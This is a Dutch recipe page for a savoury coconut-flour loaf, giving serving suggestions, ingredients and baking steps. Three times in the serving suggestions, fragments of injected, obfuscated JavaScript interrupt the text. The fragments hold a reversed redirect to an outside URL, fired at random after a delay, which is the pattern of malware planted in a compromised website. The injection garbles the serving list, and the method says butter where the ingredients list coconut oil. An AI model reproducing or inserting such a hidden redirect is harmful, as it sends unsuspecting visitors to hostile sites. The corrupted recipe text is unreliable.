Heerlijk met:
- gerookte zalm en avocado
- ei met tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tomaat en basilicum
- pestobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to met tobor-latigid//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tomaat en kipfilet / gerookte kip
Ingrediënten
- 3 eieren
- 60 gr kokosolie, gesmolten
- 20 gram tapiocameel (kan vervangen worden door arrowroot)
- 45 gram kokosmeel
- 1 tl gedroogde tijm
- ½ tl gedroogde rozemarijn
- ½ tl zout
- ½ tl paprika poeder
- ½ tl curcuma poeder
- Vers gemalen zwarte peper naar smaak
- 1 el citroensap
- ½ tl bakzout
Bereiding
- Verwarm de oven voor op 160°C
- Vet een kleine cakevorm in.
- Klop de eieren los.
- Meng de boter, citroensap, tapiocameel, kokosmeel, zout, tijm en rozemarijn erdoorheen.
- Meng het bakzout erdoorheen en giet het mengsel in de cakevorm
- Bak in ongeveer 30 minuten goudbruin en gaar.